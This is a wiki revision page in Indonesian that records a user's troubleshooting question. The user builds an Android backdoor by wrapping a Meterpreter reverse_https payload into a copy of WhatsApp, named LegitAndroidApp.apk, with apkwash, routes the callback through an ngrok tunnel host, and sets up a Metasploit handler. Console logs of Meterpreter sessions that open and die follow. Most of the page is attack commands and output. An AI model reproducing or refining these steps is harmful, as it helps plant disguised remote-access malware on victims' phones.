Difference between revisions of "MSF: ngrok"
		
		
		
		
		
		Jump to navigation
		Jump to search
		
				
		
		
	
Onnowpurbo (talk | contribs)  (Created page with "  pak saya kan mau coba metasploit + ngrok, + apkwash  pertama saya make ngrok  $ngrok tcp 1337  keluar nya tcp://2.tcp.ngrok.io:11394  terus saya make apkwash  $apkwash -p an...")  | 
				Onnowpurbo (talk | contribs)   | 
				||
| Line 5: | Line 5: | ||
pertama saya make ngrok  | pertama saya make ngrok  | ||
| − | $ngrok tcp 1337  | + |  $ngrok tcp 1337  | 
keluar nya tcp://2.tcp.ngrok.io:11394  | keluar nya tcp://2.tcp.ngrok.io:11394  | ||
| Line 11: | Line 11: | ||
terus saya make apkwash  | terus saya make apkwash  | ||
| − | + |  apkwash -p android/meterpreter/reverse_https LHOST=2.tcp.ngrok.io LPORT=11394 -o LegitAndroidApp.apk -x whatsapp.apk  | |
terus saya buka msfconsole  | terus saya buka msfconsole  | ||
| − | + |  msfconsole  | |
| − | + |    use exploit/multi/handler  | |
| − | + |    set payload ndroid/meterpreter/reverse_https  | |
| − | + |    set lport 1337  | |
| − | + |    set lhost 127.0.0.1 atau 2.tcp.ngrok.io  | |
| − | + |    exploit  | |
nah kemudian saya kirim backdoor nya ke hp saya.. saya coba tp mesti gini , kenapa ya apakah ada yg salah ? please jawab:)  | nah kemudian saya kirim backdoor nya ke hp saya.. saya coba tp mesti gini , kenapa ya apakah ada yg salah ? please jawab:)  | ||
| − | *] Started reverse TCP handler on 127.0.0.1:1337    | + |  *] Started reverse TCP handler on 127.0.0.1:1337    | 
| − | [*] Sending stage (73808 bytes) to 127.0.0.1  | + |  [*] Sending stage (73808 bytes) to 127.0.0.1  | 
| − | [*] Meterpreter session 1 opened (127.0.0.1:1337 -> 127.0.0.1:36424) at 2020-08-07 00:45:11 +0700  | + |  [*] Meterpreter session 1 opened (127.0.0.1:1337 -> 127.0.0.1:36424) at 2020-08-07 00:45:11 +0700  | 
| − | [*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: Died  | + |  [*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: Died  | 
| − | [*] Sending stage (73808 bytes) to 127.0.0.1  | + |  [*] Sending stage (73808 bytes) to 127.0.0.1  | 
| − | [*] Meterpreter session 2 opened (127.0.0.1:1337 -> 127.0.0.1:36430) at 2020-08-07 00:46:19 +0700  | + |  [*] Meterpreter session 2 opened (127.0.0.1:1337 -> 127.0.0.1:36430) at 2020-08-07 00:46:19 +0700  | 
| − | [*] 127.0.0.1 - Meterpreter session 2 closed.  Reason: Died  | + |  [*] 127.0.0.1 - Meterpreter session 2 closed.  Reason: Died  | 
Latest revision as of 12:26, 5 January 2021
pak saya kan mau coba metasploit + ngrok, + apkwash
pertama saya make ngrok
$ngrok tcp 1337
keluar nya tcp://2.tcp.ngrok.io:11394
terus saya make apkwash
apkwash -p android/meterpreter/reverse_https LHOST=2.tcp.ngrok.io LPORT=11394 -o LegitAndroidApp.apk -x whatsapp.apk
terus saya buka msfconsole
msfconsole use exploit/multi/handler set payload ndroid/meterpreter/reverse_https set lport 1337 set lhost 127.0.0.1 atau 2.tcp.ngrok.io exploit
nah kemudian saya kirim backdoor nya ke hp saya.. saya coba tp mesti gini , kenapa ya apakah ada yg salah ? please jawab:)
*] Started reverse TCP handler on 127.0.0.1:1337 [*] Sending stage (73808 bytes) to 127.0.0.1 [*] Meterpreter session 1 opened (127.0.0.1:1337 -> 127.0.0.1:36424) at 2020-08-07 00:45:11 +0700 [*] 127.0.0.1 - Meterpreter session 1 closed. Reason: Died [*] Sending stage (73808 bytes) to 127.0.0.1 [*] Meterpreter session 2 opened (127.0.0.1:1337 -> 127.0.0.1:36430) at 2020-08-07 00:46:19 +0700 [*] 127.0.0.1 - Meterpreter session 2 closed. Reason: Died